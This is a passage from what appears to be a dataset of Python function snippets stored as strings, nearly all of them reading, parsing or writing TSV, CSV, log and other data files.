'Price', 'Amount',\n 'AmountRest', 'DealId', 'DealPrice', 'OI', 'Flags'], skiprows = 3, parse_dates = ['Received', 'ExchTime'], \n date_parser = lambda x: datetime.strptime(x, '%d.%m.%Y %H:%M:%S.%f'),\n converters = {'OrderId': int, 'Price': int, 'Amount': int,'AmountRest': int, 'DealId': int, 'DealPrice': int, 'OI': int, 'Flags': str})\n\n if (verbose):\n print('Finished parsing ', path2file)\n\n return ret", "def get_info(info_filename):\n with open(info_filename) as info_file:\n info_dict = csv.DictReader(info_file)\n info = {}\n for row in info_dict:\n info[row['path']] = datetime.datetime.strptime(row['start'],\n '%Y-%m-%d')\n return info", "def _read_tsv(cls, input_file, quotechar=None):\n with open(input_file, \"r\", encoding='utf-8') as f:\n reader = csv.reader(f, delimiter=\"\\t\", quotechar=quotechar)\n lines = []\n for line in reader:\n lines.append(line)\n return lines", "def load_links(self) -> Tuple[List[str], List[str]]:\n\n with open(URL_FILE, 'r') as txt_file:\n lines = txt_file.read().split()\n\n urls = []\n for line in lines:\n urls.append(line.split(',')[0])\n \n return lines, urls", "def parse_data_from_file(path):\n print(path.stem)\n \n raw = path.stem.split('-')\n\n rawdate = raw[0][2:]\n print(rawdate)\n date = rawdate[6:] + \"/\" + rawdate[4:6] + '/' + rawdate[0:4]\n rawtime = raw[1]\n time = rawtime[0:2] + \"h\" + rawtime[2:4] + \"m\" + rawtime[4:6] + \"s\"\n dt = datetime.strptime(rawdate+rawtime, '%Y%m%d%H%M%S')\n print(dt)\n return dt", "def parse_file(filepath):\n\n #number_pattern = '(\\d+(?:\\.\\d+)?)'\n #number_pattern = '(\\d+(?:\\.\\d+)?)\\s+(\\d+(?:\\.\\d+)?)\\s+[|k]?'\n #line_pattern = '^\\s*%s\\.*hr.*min.*$' 
% ('\\s+'.join([number_pattern for x in range(5)]))\n\n line_pattern = r'^\\s*(\\d+(?:\\.\\d+)?)\\s+(\\d+(?:\\.\\d+)?)\\s+[|k]?\\s+(\\d+(?:\\.\\d+)?)\\s+(\\d+(?:\\.\\d+)?)\\s+[|k]?\\s+(\\d+(?:\\.\\d+)?)\\s+(\\d+(?:\\.\\d+)?)\\s+[|k]?\\s+(\\d+(?:\\.\\d+)?)\\s+(\\d+(?:\\.\\d+)?)\\s+[|k]?\\s+(\\d+(?:\\.\\d+)?)\\s+(\\d+(?:\\.\\d+)?)\\s+[|k]?\\s+.*hr.*min.*$'\n\n data = [] # create an empty list to collect the data\n # open the file and read through it line by line\n with open(filepath, 'r') as file_object:\n line = file_object.readline()\n while line:\n #print(\"line: \", line)\n match = re.match(line_pattern, line)\n if match:\n #print(\"match line: \", line)\n #print(match.groups())\n row = {\n 'l_rate': match.group(1),\n 'iter': match.group(2),\n 'epoch': match.group(3),\n 'num': match.group(4),\n 'valid_loss': match.group(5),\n 'valid_acc': match.group(6),\n 'train_loss': match.group(7),\n 'train_acc': match.group(8),\n 'batch_loss': match.group(9),\n 'batch_acc': match.group(10)\n }\n #print(row)\n #return match.groups()\n\n # append the dictionary to the data list\n data.append(row)\n\n line = file_object.readline()\n\n # create a pandas DataFrame from the list of dicts\n print(\"data: \", data)\n df = pd.DataFrame(data)\n print(df.ndim)\n print(df.shape)\n print(df.dtypes)\n print(\"data frame: \", df)\n # set the School, Grade, and Student number as the index\n #df.set_index(['epoch', 'valid_loss', 'valid_acc', 'train_loss', 'train_acc'], inplace=True)\n #df.set_index(['epoch'], inplace=True)\n # consolidate df to remove nans\n #df = df.groupby(level=data.index.epoch).first()\n # upgrade Score from float to integer\n df = df.apply(pd.to_numeric, errors='ignore')\n return df", "def open_tsv(path, multi=False, encoding='utf-8'):\n xx = 0\n DRtn = {}\n for line in file_iter(path, encoding=encoding):\n line = line.strip('\\r\\n')\n LSplit = line.split('\\t')\n \n if xx == 0:\n LKeys = LSplit\n else: \n yy = 0\n DItem = {}\n for key in LKeys:\n DItem[key] = LSplit[yy]\n yy += 1\n \n key = DItem[LKeys[0]]\n if not multi:\n # A single primary key\n assert not key in DRtn, key\n DRtn[key] = DItem\n elif multi == -1:\n # Country codes HACK!\n if key in DRtn: \n continue\n DRtn[key] = DItem\n else: \n # Can have multiple primary keys\n # (e.g. 
language index info)\n if not key in DRtn: \n DRtn[key] = []\n DRtn[key].append(DItem)\n del DItem[LKeys[0]]\n xx += 1\n return DRtn", "def parse_file_list(self, file_path=None, file_name_id='Producer Granule ID', url_id='Online Access URLs'):\n\n # read in and maintain the raw csv file as df\n df = pd.read_csv(file_path)\n\n # record the number of files\n self.file_num = df.__len__()\n\n # initiate the data frame\n self.file_list = pd.DataFrame()\n self.file_list['download_dir'] = np.NaN\n self.file_list['file_name'] = df[file_name_id]\n self.file_list['online_url'] = df[url_id]\n self.file_list['status'] = 0\n self.file_list['year'] = 0\n self.file_list['day'] = 0\n self.file_list = self.file_list.reset_index(drop=True)\n\n # clean up the variables for a file list downloaded from Reverb\n # extract http urls from the file list\n print(\"Extracting http urls from the file list...\")\n self.file_list['online_url'] = self.file_list['online_url'].str.rstrip(\"\\'\").str.split(',').str[1]\n self.file_list['year'] = self.file_list['online_url'].str.split('/', expand=True).iloc[:, 7]\n self.file_list['day'] = self.file_list['online_url'].str.split('/', expand=True).iloc[:, 8]\n self.file_list['download_dir'] = self.download_dir + self.file_list['year'] + '/' + self.file_list['day'] + '/'", "def readBookmarkFromFile(bmPathName):\n outlines = []\n lastTabNum = 0\n r = re.compile(r'\\s*(.*)\\s+(\\d+\\.*\\d*)\\s*')\n r2 = re.compile(r'\\s*\\S.*')\n lines=codecs.open(bmPathName,mode='r',encoding='utf-16').readlines()\n # print('lines:',lines)\n for line in lines:\n line=line.encode('utf-8')\n # print('line:',line)\n if not r2.match(line): # line contain only white spaces\n continue\n matchObj = r.match(line)\n if not matchObj:\n print ('bookmark file format error in: ' + line)\n sys.exit(0)\n tabNum = matchObj.start(1)\n bmTitle = matchObj.group(1)\n pageRatio = float(matchObj.group(2)) - 1\n bmPage = int(pageRatio)\n bmRatio = pageRatio - bmPage\n outline = {}\n outline['/Title'] = bmTitle\n outline['/Ratio'] = pageRatio\n tempOutlines = outlines\n if tabNum > lastTabNum + 1:\n print ('bookmark file format error in: ' + line)\n sys.exit(0)\n elif tabNum == lastTabNum + 1:\n for i in range(0, tabNum - 1):\n tempOutlines = tempOutlines[-1]\n tempOutlines.append([outline])\n else:\n for i in range(0, tabNum):\n tempOutlines = tempOutlines[-1]\n tempOutlines.append(outline)\n lastTabNum = tabNum\n return outlines", "def _read_tsv(cls, input_file, quotechar=None):\r\n with open(input_file, \"r\", encoding=\"utf-8\") as f:\r\n return list(csv.reader(f, delimiter=\"\\t\", quotechar=quotechar))", "def readfile(self,filenm,delimiter):\n\n timefiledata = []\n timefileextra = {}\n fixtimeflag = False\n hour0=hour1=False\n\n\n if isinstance(filenm,(str,unicode)):\n timeobject = readTextFile(filenm,delimiter)\n else:\n timeobject = filenm\n\n\n for idx,lines in enumerate(timeobject):\n\n try:\n floatlines = map(float,lines)\n month,date,hour = floatlines[:3]\n dataval = floatlines[3:]\n ##Code to check if the first time value is 1.0. If so subtract every hour by 0.5\n\n if not hour1 or hour0:\n hour1 = hour\n if hour0==1.0 and hour1==2.0:\n #Go back to the array that stores timevalues and fix the hour and time stamp\n timefiledata[0]['h']=0.5\n timefiledata[0]['tstamp']=timeStamp(1,1,0.5)\n fixtimeflag=True\n\n if not hour0:\n hour0 = hour\n\n if fixtimeflag:\n hour = hour-0.5\n ##Code to check if the first time value is 1.0. 
If so subtract every hour by 0.5\n\n timestamp = timeStamp(month,date,hour)\n\n timefiledata.append({\"m\":month,\"d\":date,\"h\":hour,\"readStadicData\":dataval,\"tstamp\":timestamp})\n\n except ValueError:\n print(sys.exc_info())\n timefileextra[lines[0]]=lines[1]\n\n return (timefiledata,timefileextra)", "def _read_tsv(cls, input_file, quotechar=None):\r\n with open(input_file, \"r\", encoding='utf-8') as f:\r\n reader = csv.reader(f, delimiter=\"\\t\", quotechar=quotechar)\r\n lines = []\r\n for line in reader:\r\n lines.append(line)\r\n return lines", "def _read_tab(pth):\n if not os.path.exists(pth):\n raise SampleTableFileException(\n \"File does not exist: {}\".format(pth))\n read_csv_kwargs = {\"engine\": \"python\", \"dtype\": str,\n \"index_col\": False, \"keep_default_na\": False,\n \"na_values\": [\"\"]}\n return pd.read_csv(pth, sep=infer_delimiter(pth), **read_csv_kwargs)", "def _read_tsv(cls, input_file, quotechar=None):\n with open(input_file, \"r\", encoding='utf-8') as f:\n # reader = csv.reader(f, delimiter=\"\\t\", quotechar=quotechar)\n lines = []\n for line in f.readlines():\n # if sys.version_info[0] == 2:\n # line = list(cell.decode('utf-8') for cell in line)\n lines.append(line.strip().split('\\t'))\n return lines", "def _read_tsv(cls, input_file, quotechar=None):\r\n with open(input_file, \"r\", encoding=\"utf-8\") as f:\r\n reader = csv.reader(f, delimiter=\"\\t\", quotechar=quotechar)\r\n lines = []\r\n for line in reader:\r\n lines.append(line)\r\n return lines", "def seperate_file(file):\n firstHalf = file.split(\"\\\\\"[-1])\n #print \"This is the node\", firstHalf[-2]\n node = firstHalf[-2]\n print \"\\nReading results for \", node\n return node", "def get_file(file_to_edit):\n events = []\n file_path = lrs_path + file_to_edit\n with open(file_path, \"r\") as the_file:\n filereader = csv.reader(the_file)\n for row in filereader:\n events.append(row)\n the_file.close()\n return events", "def readTotitle(fh):\n preLines = []\n while True:\n l = fh.readline().strip()\n if l.startswith('>'):\n return (preLines,l)\n elif l == '':\n return preLines,None\n else:\n preLines.append(l)", "def read_tsv_file(input_file, quotechar=None):\n with open(input_file, \"r\", encoding='utf-8') as f:\n reader = csv.reader(f, delimiter=\"\\t\", quotechar=quotechar)\n x, y = [], []\n for line in reader:\n x.append(line[0])\n y.append(int(line[1]))\n return x, y", "def read_table(cls, filepath_or_buffer, *args, **vargs):\n if filepath_or_buffer.endswith('.csv') and 'sep' not in vargs:\n vargs['sep'] = ','\n df = pandas.read_table(filepath_or_buffer, *args, **vargs)\n labels = df.columns\n return Table([df[label].values for label in labels], labels)", "def _read_tsv(cls, input_file, quotechar=None):\n with open(input_file, \"r\", encoding=\"utf-8-sig\") as f:\n return list(csv.reader(f, delimiter=\"\\t\", quotechar=quotechar))", "def parse_hdob_file(path):\n col_names = [\"obs_time\", \"lat\", \"lon\", \"static_air_press\", \"geo_pot_height\",\n \"sfc_press_dval\", \"t_air\", \"t_dew\", \"wind_dir_spd\", \"wind_peak\",\n \"sfc_wind_peak\", \"rain_rate\", \"qc_flags\"]\n file_header = ''\n obs_data = []\n\n # Determine if 'path' is a path or url\n if isfile(path):\n # open & read local file\n with open(path, 'r') as fh:\n for idx, line in enumerate(fh):\n line = line.rstrip('\\n')\n\n if (idx == 3):\n file_header = line\n elif ((idx > 3) and (idx < 24)):\n curr_line = line.split(' ')\n curr_line = [x for x in curr_line if x != ' ']\n obs_data.append(curr_line)\n hdob_df = 
pd.DataFrame(data=obs_data, index=range(0, len(obs_data)), columns=col_names)\n hdob_obj = HDOBFile(file_header, hdob_df)\n print(hdob_obj)\n # elif (isURL):", "def _read_tsv(cls, input_file, quotechar=None):\r\n with open(input_file, \"r\", encoding=\"utf-8-sig\") as f:\r\n reader = csv.reader(f, delimiter=\"\\t\", quotechar=quotechar)\r\n lines = []\r\n for line in reader:\r\n lines.append(line)\r\n return lines", "def get_reference_header(file):\n\n with open(file, \"r\") as typing_report:\n lines = typing_report.readlines()\n return lines[1].split('\\\\t')[3]", "def _read_vtc(vtc_file):\r\n with open(vtc_file, 'rb') as f:\r\n filebytes = f.read()\r\n\r\n hdr = {}\r\n hdr['file_guid'] = hexlify(filebytes[:16])\r\n # not sure about the 4 Bytes inbetween\r\n\r\n i = 20\r\n mpg_file = []\r\n start_time = []\r\n end_time = []\r\n while i < len(filebytes):\r\n mpg_file.append(_make_str(unpack('c' * 261, filebytes[i:i + 261])))\r\n i += 261\r\n Location = filebytes[i:i + 16]\r\n correct = b'\\xff\\xfe\\xf8^\\xfc\\xdc\\xe5D\\x8f\\xae\\x19\\xf5\\xd6\"\\xb6\\xd4'\r\n assert Location == correct\r\n i += 16\r\n start_time.append(_filetime_to_dt(unpack('<q',\r\n filebytes[i:(i + 8)])[0]))\r\n i += 8\r\n end_time.append(_filetime_to_dt(unpack('<q',\r\n filebytes[i:(i + 8)])[0]))\r\n i += 8\r\n\r\n return mpg_file, start_time, end_time", "def parse_tab_outfile(busco):\n with open(busco) as file:\n return file.read().split(\"\\n\")", "def openfile(of_file):\n with open(of_file, 'r') as f:\n return f.readlines()", "def _read_tsv( input_file, quotechar=None):\n with open(input_file, \"r\", encoding=\"utf-8-sig\") as f:\n return list(csv.reader(f, delimiter=\"\\t\", quotechar=quotechar))", "def get_total_link_num(th_object, start, end, filename, path):\n ln = th_object.get_link_nums(start, end, filename)\n prev = \"\"\n with open(path, 'w') as f:\n f.write(\"Time,No_Link\\n\")\n for k, v in ln.items():\n tmp = str(k.time()).split('.')[0]\n if prev != tmp:\n f.write(tmp + \",\" + str(v) + \"\\n\")\n prev = tmp", "def convert_tcr(self):\n\n def read_text(file_name, event_a_id, event_b_id):\n idx_val = {\"span1\": [], \"span2\": [], \"signal\": []}\n parsed_doc = minidom.parse(self.dir_path + \"tcr/TemporalPart/{}\".format(file_name))\n elements = parsed_doc.getElementsByTagName('TEXT')\n text = \"\"\n token_index = 0\n tagxid = {\"EVENT\": \"eid\", \"TIMEX3\": \"tid\"}\n for element in elements:\n if element.tagName == \"TEXT\":\n for item in element.childNodes:\n if item.nodeName == \"#text\":\n text += item.wholeText\n token_index += len(item.wholeText)\n elif item.nodeName == \"EVENT\" or item.nodeName == \"TIMEX3\":\n item_text = ' '.join([child_node.wholeText for child_node in item.childNodes])\n text += item_text\n start_end = [token_index, token_index + len(item_text)]\n token_index += len(item_text)\n\n if item.attributes[tagxid[item.nodeName]].value == event_a_id:\n idx_val[\"span1\"].append(start_end)\n event_a_text = item_text\n elif item.attributes[tagxid[item.nodeName]].value == event_b_id:\n idx_val[\"span2\"].append(start_end)\n event_b_text = item_text\n return text, idx_val, [event_a_text, event_b_text]\n\n mismatch = 0\n data = pd.DataFrame(columns=self.scheme_columns)\n\n test_files = [\"2010.01.08.facebook.bra.color\", \"2010.01.12.haiti.earthquake\", \"2010.01.12.turkey.israel\",\n \"2010.01.13.google.china.exit\", \"2010.01.13.mexico.human.traffic.drug\"]\n\n with open(self.dir_path + \"tcr/CausalPart/allClinks.txt\", 'r') as in_file:\n lines = in_file.readlines()\n\n annotations = 
[line.strip().split('\\t') for line in lines]\n\n for annotation in annotations:\n file_path = annotation[0] + \".tml\"\n text, idx_val, events_text = read_text(file_path, annotation[1], annotation[2])\n direction = 1 if annotation[3] == \"caused_by\" else 0\n\n split = 2 if annotation[0] in test_files else 1\n\n # saving the sample\n new_row = {\"original_id\": '', \"span1\": [events_text[0]], \"span2\": [events_text[1]], \"signal\": [],\n \"context\": text,\n \"idx\": idx_val, \"label\": 1, \"direction\": direction,\n \"source\": self.namexid[\"tcr\"],\n \"ann_file\": file_path,\n \"split\": split}\n\n if self.check_span_indexes(new_row):\n data = data.append(new_row, ignore_index=True)\n else:\n mismatch += 1\n return data, mismatch", "def open_file_link_manager(file):\n pass", "def fromtab(args):\n p = OptionParser(fromtab.__doc__)\n p.set_sep(sep=None)\n p.add_option(\n \"--noheader\", default=False, action=\"store_true\", help=\"Ignore first line\"\n )\n p.add_option(\"--replace\", help=\"Replace spaces in name to char\")\n opts, args = p.parse_args(args)\n\n if len(args) != 2:\n sys.exit(not p.print_help())\n\n tabfile, fastafile = args\n sep = opts.sep\n replace = opts.replace\n fp = must_open(tabfile)\n fw = must_open(fastafile, \"w\")\n nseq = 0\n if opts.noheader:\n next(fp)\n for row in fp:\n row = row.strip()\n if not row or row[0] == \"#\":\n continue\n\n name, seq = row.rsplit(sep, 1)\n if replace:\n name = name.replace(\" \", replace)\n print(\">{0}\\n{1}\".format(name, seq), file=fw)\n nseq += 1\n fw.close()\n\n logging.debug(\"A total of {0} sequences written to `{1}`.\".format(nseq, fastafile))", "def file_regex(line):\n # (size, month, day, hour, minute, filename)\n regex = r\"[-rwxd]{9}\\s\\d+\\s\\w*\\s[a-zA-Z0-9\\-]*\\s*(\\d*)\\s(\\w{3})\\s+(\\d{1,2})\\s(\\d{2})\\:(\\d{2})\\s([^\\n]+)\"#\\n\"\n lst = re.findall(regex, line)\n t = lst[0]\n lst = [int(t[0]), t[1], int(t[2]), int(t[3]), int(t[4]), t[5]]\n t = tuple(lst) \n return t", "def create_table(file_to_use):\n lines = []\n for line in file_to_use:\n lines.append(line.split(\",\"))\n lines[-1][-1] = lines[-1][-1][:-1]\n return lines", "def _read_tsv(cls, input_file, quotechar=None):\n return readfile(input_file)", "def storeTabDelimitedFile(inputFile):\n\n\n list0 = []\n with open(inputFile, 'r') as f:\n newlist = f.readlines()\n #print(newlist)\n for i in range(len(newlist)):\n #newlist[i] = newlist[i].strip('\\t')\n newlist[i] = newlist[i].strip('\\n') # this makes the matrix easier to read as i will not be converting back to original format\n x = newlist[i].split('\\t') # everytime a tab appears in a lines string, the string is split and is storing data in a list\n list0.append(x)\n print(list0) # list0 is the matrix as it contains sublists and elements that can be individually accessed", "def _csv_download(page):\n # gc = gspread.login(page.timetable.google_user, page.timetable.google_passwd)\n gc = googleoauth.authenticate_google_docs()\n csv_file = gc.open('WebValley2019')\n\n # gsession = gss.Client(page.timetable.google_user, page.timetable.google_passwd)\n # ss = gss.Spreadsheet(page.timetable.spreadsheet)\n # csv_file = gsession.download(ss, gid=page.timetable.spreadsheet_gid)\n # read = csv_file.read()\n read = csv_file.worksheet('TIMETABLE').get_all_values()\n # print \"csv\", read\n return read", "def readFile(filename):\n\tfileRepo = repertoire + filename + extension # Position du fichier\n\ttabPositions = [] # Cree un tableau vide\n\tdictPosition = {} # Cree un dictionnaire vide\n\ttry:\n\t\t# Ouvre 
en mode lecture\n\t\t# La methode with ferme le fichier automatiquement\n\t\twith open(fileRepo, \"r\") as robFile:\n\t\t\tcontenu = robFile.read().splitlines()\n\t\tassert contenu[0] == filename # Controle si le fichier correspond\n\texcept AssertionError:\n\t\treturn 1\n\texcept:\n\t\treturn 0 # Retourne 0 en cas d'erreur\n\telse:\n\t\tdel(contenu[0]) # Supprime le nom de fichier du contenu lisible\n\t\tfor line in contenu: # Parcours toutes les lignes\n\t\t\tif line == \"StepEnd\": # Si on arrive a la fin d'un pas\n\t\t\t\ttabPositions.append(dictPosition) # Ajoute l'etape dans le tableau\n\t\t\t\tdictPosition = {} # Vide le dictionnaire\n\t\t\telse:\n\t\t\t\ttry:\n\t\t\t\t\t# Stock la position dans le dictionnaire\n\t\t\t\t\tdictPosition[int(line.split(\":\")[0])] = int(line.split(\":\")[1])\n\t\t\t\texcept ValueError:\n\t\t\t\t\t# Affiche la ligne qui contient l'erreur\n\t\t\t\t\tprint str(contenu.index(line)) + \" : \" + line\n\n\t\treturn tabPositions # Retourne le tableau rempli", "def read(self, filename=None, **kwargs):\n \n # --- Standard tests and exceptions (generic code)\n if filename:\n self.filename = filename\n if not self.filename:\n raise Exception('No filename provided')\n if not os.path.isfile(self.filename):\n raise OSError(2,'File not found:',self.filename)\n if os.stat(self.filename).st_size == 0:\n raise EmptyFileError('File is empty:',self.filename)\n try:\n from nptdms import TdmsFile\n except:\n raise Exception('Install the library nptdms to read this file')\n\n fh = TdmsFile(self.filename, read_metadata_only=False)\n # --- OLD, using some kind of old version of tdms and probably specific to one file\n # channels_address = list(fh.objects.keys())\n # channels_address = [ s.replace(\"'\",'') for s in channels_address]\n # channel_keys= [ s.split('/')[1:] for s in channels_address if len(s.split('/'))==3]\n # # --- Setting up list of signals and times\n # signals=[]\n # times=[]\n # for i,ck in enumerate(channel_keys):\n # channel = fh.object(ck[0],ck[1])\n # signals.append(channel.data)\n # times.append (channel.time_track())\n\n # lenTimes = [len(time) for time in times]\n # minTimes = [np.min(time) for time in times]\n # maxTimes = [np.max(time) for time in times]\n # if len(np.unique(lenTimes))>1:\n # print(lenTimes)\n # raise NotImplementedError('Different time length') \n # # NOTE: could use fh.as_dataframe\n # if len(np.unique(minTimes))>1:\n # print(minTimes)\n # raise NotImplementedError('Different time span') \n # if len(np.unique(maxTimes))>1:\n # print(maxTimes)\n # raise NotImplementedError('Different time span') \n # # --- Gathering into a data frame with time\n # time =times[0]\n # signals = [time]+signals\n # M = np.column_stack(signals)\n # colnames = ['Time_[s]'] + [ck[1] for ck in channel_keys]\n # self['data'] = pd.DataFrame(data = M, columns=colnames)\n # --- NEW\n self['data'] = fh\n\n #for group in fh.groups():\n # for channel in group.channels():\n # #channel = group['channel name']\n # print('Group:',group.name , 'Chan:',channel.name)\n # channel_data = channel[:]\n # if len(channel_data)>0:\n # print(' ', type(channel_data))\n # #print(' ', len(channel_data))\n # print(' ', channel_data)\n # print(' ', channel_data[0])\n # try:\n # print(channel.time_track())\n # except KeyError:\n # print('>>> No time track')", "def _get_parsed_files(self):\n\n parsed = []\n with Historical_ROAs_Parsed_Table() as t:\n for row in t.execute(f'SELECT * FROM {t.name}'):\n parsed.append(row['file'])\n return parsed", "def fileReader(filename):\n try:\n 
openfile = open(filename, 'r')\n urls = openfile.read()\n openfile.close()\n return urls\n except IOError:\n print \"File tidak ada\"\n exit()", "def parse_lines(filename):\n line_counter = 0\n with open(filename, 'r') as rf:\n for line_txt in rf:\n try:\n d = json.loads(line_txt)\n tup = (\n d['attributed_to'],\n int(d['date_time'][8:10]),\n d.get('used_first_time_today', False),\n d.get('first_utm_source', 'unknown') \n )\n except:\n print('Error parsing line_txt:', line_txt)\n line_counter += 1\n if line_counter % 10 ** 6 == 0:\n print('read %dM lines' % (line_counter // 10 ** 6))\n yield tup # yield: https://stackoverflow.com/a/231855", "def get_fping_rtt(self, filename):\n df = self.parse_fping(filename)\n df2 = df[['host', 'RTT']].groupby('host').describe().unstack()\n levels = df2.columns.levels\n labels = df2.columns.labels\n df2.columns = levels[1][labels[1]]\n return df2.T", "def f_open(loc):\n file = open(loc)\n t, U = [], []\n for l in file:\n data = l.split(\",\") # 3<=>t; 4<=>U\n t.append(float(data[3]))\n U.append(float(data[4]))\n return t, U", "def c_open(file):\n data = cassy.CassyDaten(file)\n t = data.messung(1).datenreihe(\"t\").werte\n I = data.messung(1).datenreihe(\"I_A2\").werte\n U = data.messung(1).datenreihe(\"U_B2\").werte\n return t, U, I", "def _read_tsv(file_path):\n translation_pairs = []\n with file_path.open() as f:\n # Note: the correct way to do this is with csv.DictReader, but some examples\n # have quote characters that confuse the csv parser. Since we know the\n # source never has its own tab or newline characters, basic Python string\n # manipulation is fine here, as long as the model doesn't predict tabs or\n # newlines.\n for line in f:\n line = line.strip()\n line = line.split('\\t')\n if len(line) != 2:\n raise ValueError(\n f'Line {line} could not be parsed. 
You may need to manually '\n 'replace tab or newline characters in the model output with '\n 'spaces.'\n )\n source, translation = line\n translation_pairs.append(\n evaluation.TranslationPair(source=source, translation=translation)\n )\n return translation_pairs", "def node_link_num(th_object, start, end, file_name, node1, node2, path):\n save_path = path + node1 + \"_\" + node2 + \"_vs_t.csv\"\n links_num = th_object.get_node_links_num(start, end, file_name, [node1, node2])\n with open(save_path, \"w+\") as f:\n f.write(\"Time,No_Link\\n\")\n for k in file_name:\n f.write(str(k)[11:-7] + \",\" + str(links_num[k]) + \"\\n\")\n print(node1 + \" \" + node2 + \" link number exported\")", "def link(self, fname):\n return fname", "def _read_tsv(cls, input_file, quotechar=None):\n with open(input_file, \"r\", encoding=\"utf-8-sig\") as f:\n reader = csv.reader(f, delimiter=\"\\t\", quotechar=quotechar)\n lines = []\n for line in reader:\n # if sys.version_info[0] == 2:\n # line = list(unicode(cell, 'utf-8') for cell in line)\n lines.append(line)\n return lines", "def _parse_lladdr(line):\n tokens = line.split()\n return tokens[1]", "def parse_table_file(file):\n\n rows = [row for row in csv.reader(file.decode().splitlines(), delimiter=\",\",\n doublequote=True, escapechar=None, quotechar='\"',\n quoting=csv.QUOTE_MINIMAL, skipinitialspace=True)]\n\n if len(rows) < 2:\n raise Exception(\"File must contain at least two rows.\")\n\n # get header\n attributes = rows[0]\n\n # go through the csv by row\n data = []\n for row in rows[1:]:\n data.append(row)\n\n if len(attributes) < 1:\n raise Exception(\"File must contain at least one column.\")\n\n return attributes, data", "def file_parser(filename):\n LOG_FORMAT = \"%a %l %u %t \\\"%r\\\" %>s %b %D\"\n\n line_parser = apache_log_parser.make_parser(LOG_FORMAT)\n\n parsed_entries = []\n\n with open(filename) as f:\n for line in f:\n parsed_entries.append(line_parser(line))\n\n # Sort the parsed log entries by timestamp. 
Some of the log entries in the\n # provided example take a long time to process so they are not in order,\n # this messes up splitting the entries into minute chunks for processing.\n parsed_entries.sort(key=lambda x: x.get('time_received_utc_datetimeobj'))\n\n return parsed_entries", "def tsv_generator(file):\n for line in fileinput.input(file):\n article, summary = line.strip().split(\"\\t\")\n yield (article, summary)", "def _read_tsv(cls, input_file, quotechar=None):\n with open(input_file, \"r\", encoding=\"utf-8-sig\") as f:\n reader = csv.reader(f, delimiter=\"\\t\", quotechar=quotechar)\n lines = []\n for line in reader:\n if sys.version_info[0] == 2:\n line = list(cell for cell in line)\n lines.append(line)\n return lines", "def parse_2015(year, file):\n with open(file) as file:\n content = file.read()\n # Place, Name, Age, Sex/plc, Sex, Time, Pace, City, State, Bib No,\n # Clock Time, Link (NOTE: not sure why omitting the link works, but it does)\n cols = [\n 'place', 'first_name', 'last_name', 'age', 'sexpl', 'sex',\n 'time', 'pace', 'city', 'state', 'bib', 'clocktime',\n ]\n parser = TDParser(columns=cols)\n parser.feed(content)\n return parser.results", "def get_table_from_file(file_name):\n try:\n with open(file_name, \"r\") as file:\n lines = file.readlines()\n\n table = [element.replace(\"\\n\", \"\").split(\"\\t\") for element in lines]\n\n nodes = list()\n for node in table:\n new_node = []\n for coordinate in node:\n new_node.append(float(coordinate))\n\n nodes.append(new_node)\n\n return nodes\n\n except FileNotFoundError as f:\n raise f from None\n except Exception as e:\n raise e from None", "def parse_tables_from_url(url, md_file):\n\n r = requests.get(url)\n parse_tables_from_html(r.text, md_file)", "def read_examples(file_name):\n start = time.time()\n print 'Reading examples from tab separated file...'\n count = 0\n i = 0\n with open(file_name, 'r') as fp:\n relation_examples = []\n for i, line in enumerate(fp):\n line.strip()\n if len(line) == 0 or len(line.split()) == 0:\n raise IOError\n else:\n fields = line.split('\\t')\n assert len(fields) == 9, \"a problem with the file format (# fields is wrong) len is \" + str(len(fields)) + \"instead of 9\"\n relation_examples.append([str(count)] + fields)\n count += 1\n print ' File contained {} lines'.format(i + 1)\n print ' Datapoints with valid features encoded: {}'.format(count)\n print ' Done in {:.2f} sec'.format(time.time() - start)\n return relation_examples", "def open_file(path):\r\n f = open(path, encoding='utf-8', errors='ignore')\r\n data = f.readlines()\r\n lst_with_data = []\r\n for i in data:\r\n i = i.replace('\"', ' ').replace(\"\\t\", ' ').replace(\"\\n\", \" \").replace(\"'\", ' ').split(' ')\r\n lst_with_data.append(i)\r\n res_lst = [] \r\n for i in lst_with_data:\r\n append_lst = []\r\n for j in i:\r\n if j.isdigit() or j == \"-\":\r\n append_lst.append(j) \r\n if len(append_lst) != 0: \r\n res_lst.append(append_lst) \r\n res_lst = res_lst[1:]\r\n res = [] \r\n for i in res_lst:\r\n if len(i) != len(res_lst[0]):\r\n i = i[1:]\r\n res.append(i) \r\n else:\r\n res.append(i) \r\n ln = len(res[0])\r\n data_by_years = []\r\n for i in range(ln):\r\n data_y = []\r\n for j in res:\r\n data_y.append(j[i])\r\n data_by_years.append(data_y) \r\n dict_by_years = {}\r\n dict_with_total = file_with_total_inform(\"Total_Lviv.csv\")\r\n for i in data_by_years:\r\n dict_by_years[int(i[0])] = causes(i)\r\n dict_by_years[int(i[0])].update({\"Total\": dict_with_total[i[0]]})\r\n res_dict = {}\r\n res_dict[\"Lviv\"] = 
dict_by_years \r\n return res_dict", "def readATPMatchesParseTime(dirname):\n\tallFiles = glob.glob(dirname + \"/atp_matches_\" + \"20??.csv\")\n\tallFiles = allFiles[:-1] ## avoid 2017 since its incomplete\n\tmatches = pd.DataFrame()\n\tcontainer = list()\n\tfor filen in allFiles:\n\t\tdf = pd.read_csv(filen,\n\t\t\t\t\t\t index_col=None,\n\t\t\t\t\t\t header=0,\n\t\t\t\t\t\t parse_dates=[5],\n\t\t\t\t\t\t encoding = \"ISO-8859-1\",\n\t\t\t\t\t\t date_parser=lambda t:parse(t)) ##errored out here\n\t\tcontainer.append(df)\n\tmatches = pd.concat(container)\n\treturn matches", "def read_locations(db, openfile):\n pass", "def fileReader(pathtofile, dateheading, dtformat='%m/%d/%Y %H:%M', offset=0):\n # Read the files\n dlist = []\n if pathtofile.endswith('.csv'):\n dfr = read_csv(pathtofile)\n if pathtofile.endswith('.xlsx'):\n dfr = read_excel(pathtofile)\n else:\n dfr = read_pickle(pathtofile)\n\n # Parsing the Date column\n dfr.insert(loc=0, column='Dates',\n value=to_datetime(dfr[dateheading],\n format=dtformat) + DateOffset(hours=offset))\n\n dfr.drop(dateheading, axis=1, inplace=True) # Drop original Time column\n\n # Add df to the dlist\n dlist.append(dfr)\n\n return dlist", "def parseFileLine(self, line):\n c = line.strip().split(\":\")\n return (c[0], c[1], c[2], c[3])", "def get_ap_file(self):\n with open(self.trendfile, 'r') as readfile:\n data = json.load(readfile)\n return data['trendtable']", "def yield_refs(filename):\n f = open(file)\n f.next() # ignore header line\n for row in csv.reader(f, delimiter='\\t'):\n # print row\n yield row[0]\n f.close()", "def parse(self, filehandle):\n l = filehandle.readline()\n if l.split()[0] != '##maf':\n return\n else:\n self.setpar(l.split()[1:])\n\n l=filehandle.readline()\n while l:\n la = 